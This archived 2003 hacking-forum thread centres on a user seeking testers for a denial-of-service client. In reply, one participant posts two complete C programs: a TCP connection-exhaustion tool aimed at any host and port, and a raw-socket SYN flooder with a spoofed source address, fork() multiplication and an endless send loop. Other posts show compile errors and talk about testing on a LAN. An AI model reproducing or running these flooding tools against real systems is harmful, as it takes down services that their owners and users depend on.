Dos Testing?

coder

Oct 22 2003, 03:27 AM

OK, here we go-

> I'm writing some software that I'd like to test...
Ø A DoS client for Internet hosts. TCP Socks are established (continuously) until (hopefully) a maximum server load is reached. From this point on (or until something intervenes) the server/host should (in theory) not be able to handle much of a load (if not a complete DoS) although - that's what I'm trying to find out.
Ø So, if anyone happens to have some servers (hopefully something you actually have access to, I'd like some of the feedback data, if possible)
Ø If you do decide to test the software, I'd appreciate detailed feedback. Try to include obvious things like OS, Bandwidth (of both you and the server), timing (you can use the default if you wish), and any other details you might think important.

Well, That's my idea.
Tell me what you think?

segment

Oct 22 2003, 08:29 AM

QUOTE (coder @ Oct 22 2003, 03:27 AM)

Ø If you do decide to test the software, I'd appreciate detailed feedback. Try to include obvious things like OS, Bandwidth (of both you and the server), timing (you can use the default if you wish), and any other details you might think important.

Pretty lame excuse. All you have to do is send it to securityfocus' vuln-dev list and you will get all sorts of feedback. As for the DoS part of it, again pretty lame considering you don't state your purpose for doing the test. Consider for example... I wrote a pentest tool called brat.c (Border Router Attack Tool) who's purpose was cause bgp routers (spefically ABR's, DBR's, and BR's) to flap as each other. I won't explain in case you don't know what happens when a router flaps. (google route flap dampening).

The original idea behind this tool was to prove a theory. That as say ABR1 I could break the connection between ABR1 and ABR2 by sending back data as ABR1 causing a flap which would throw penalties to kill the connection... Reason for this was to show that any scriptkiddietard could break connections (if given enough hosts not bandwidth) between border routers.

While it sucked to write something like that, I sent it to people I know at Cisco, Juniper, and sent it to others to evaluate. Would take a bit of tweaking but the tool works. I just won't post how exactly it will work due to scriptkiddietards with too much time on their hands.

Now to answer what I mean by lame... What is the purpose of the tool for in nothing other than 3y3 wr0t3 a n3w t0ol which is what this sounds like. And I don't mean to flame so take this as you want, if you're just looking for input on the tool then send it to vuln-dev@securityfocus.com with a write up explaining what you think it's supposed to do and you'll get feedback. However, if you're not sure it works why bother. Have you tested it yourself, if so a decent coder would be able to port it to any system.

kill -9 2centsd

shaun2k2

Oct 23 2003, 07:33 PM

What the (filtered) is lame anyway? E.g you might say knocking somebody off the Internet because you selfishly want their nick on your favourite IRC network is lame...So (filtered), you've reached your goal...

Coder, here's a linux version:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#define MAX_CON 1025 /* You may have to change this, depending on your OS */
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("Usage: %s <host> <port>\n", argv[0]);
exit(-1);
}

int sock[MAX_CON];
int i;
struct sockaddr_in dest[MAX_CON];
struct hostent *host;
if((host = gethostbyname(argv[1])) == -1) {
printf("Couldn't resolve %s!\n", argv[1]);
exit(-1);
}

for(i = 0; i <= MAX_CON; i++) {
if((sock[i] = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("Couldn't create socket!\n");
exit(-1);
}

dest[i].sin_family = AF_INET;
dest[i].sin_port = htons(atoi(argv[2]));
dest[i].sin_addr = *((struct in_addr *)host->h_addr);

if(connect(sock[i], (struct sockaddr *)&dest[i], sizeof(struct sockaddr)) == -1) {
printf("Couldn't connect to %s on port %s!\n", argv[1], argv[2]);
exit(-1);
}

printf("%d : Connected!\n", i);
}
return(0);
}

I assume this is the sort of thing you are trying to do? Process table starvation attacks, despite being very simple to do, are very effective, you can often bring a server to its knees with an attack like this.

Thank you for your time.
Shaun.

coder

Oct 23 2003, 08:00 PM

hey, great S2k2 ! I really like your ports...

QUOTE

rewt@0[localhost]$ gcc locksock1.c
locksock1.c: In function `main':
locksock1.c:18: warning: comparison between pointer and integer

virus

Oct 24 2003, 09:36 AM

Yeee ha !
I'm in for this one. Just few days back my instructor for CCSP showed us a live demo of a DOS attack on one of the webservers on our LAN and believe me it was fun. We used synk4 to generate the SYN packets. I'll try this one the same LAN and post results for you coder

wickkeedd

shaun2k2

Oct 24 2003, 06:04 PM

If you want a really simple, lightweight syn flooder, try this code I wrote:

CODE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
int main(int argc, char *argv[]) {
if(argc < 3) {
printf("Usage: %s <dst> <port> <src>\n", argv[0]);
printf("Synflooder v2.0 was written by shaunige@yahoo.co.uk\n");
exit(-1);
}

int sock;
int on = 1;
char packet[4096]; /* Datagram. */
struct sockaddr_in dest;
struct iphdr *ip = (struct iphdr *) packet;
struct tcphdr *tcp = (struct tcphdr *) packet + sizeof(struct iphdr);
struct hostent *he;
if((he = gethostbyname(argv[1])) == NULL) {
printf("Couldn't resolve hostname!\n");
exit(-1);
}

if((sock = socket (AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) {
printf("Socket failed!\n");
printf("Must be root to make raw socket.\n");
exit(-1);
}
dest.sin_family = AF_INET;
dest.sin_port = htons(atoi(argv[2]));
dest.sin_addr = *((struct in_addr *)he->h_addr);
memset(packet, 0, 4096); // Zero out packet.

/* We'll fill in the header outselves. */
if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 ) {
perror("setsockopt");
exit(1);
}
// Fill in IP headers.
ip->ihl = 5;
ip->version = 4;
ip->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
ip->id = htons(1337);
ip->saddr = inet_ntoa(atoi(argv[3]));
ip->daddr = inet_ntoa(dest.sin_addr);
ip->ttl = 255;
ip->protocol = 6;
ip->check = 0;
ip->tos = 0;
ip->frag_off = 0;

// Fill in TCP headers.
tcp->source = htons(1337);
tcp->dest = htons(atoi(argv[2]));
tcp->seq = htons(random());
tcp->ack = 0;
tcp->syn = 1;
tcp->window = htons(65535);
tcp->check = 0;
tcp->doff = 5;
tcp->rst = 0;
tcp->psh = 0;
tcp->fin = 0;
tcp->urg = 0;
tcp->ack_seq = htons(0);
printf("Syn flooding: %s!\n", argv[1]);
/* Insert some more fork()'s in here, if you want. */
fork();
fork();
while(1) {
sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr));
}
return(0);
}

Compile: gcc synflood.c -o synflood

Thank you for your time.
Shaun.

shaun2k2

Oct 24 2003, 06:04 PM

[Double post removed, digger]

coder

Oct 24 2003, 06:09 PM

spe141.testdrive.hp.com> gcc synflood.c -o synflood
synflood.c:14:23: missing terminating " character
synflood.c: In function `main':
synflood.c:15: error: parse error before "shaunige"
synflood.c:15: error: syntax error at '@' token
synflood.c:15: error: stray '\' in program
synflood.c:15:23: missing terminating " character
spe141.testdrive.hp.com>

shaun2k2

Oct 24 2003, 06:41 PM

CODE

[root@localhost DoS]# gcc synflood-2.0.c -o synflood-2.0
[root@localhost DoS]#

Maybe you pasted the code wrong?

-Shaun.

coder

Oct 24 2003, 07:29 PM

dang it, i don't know C well enough to debug all this code- i have yet to successfully compile any of your code

oh well- better hit the books...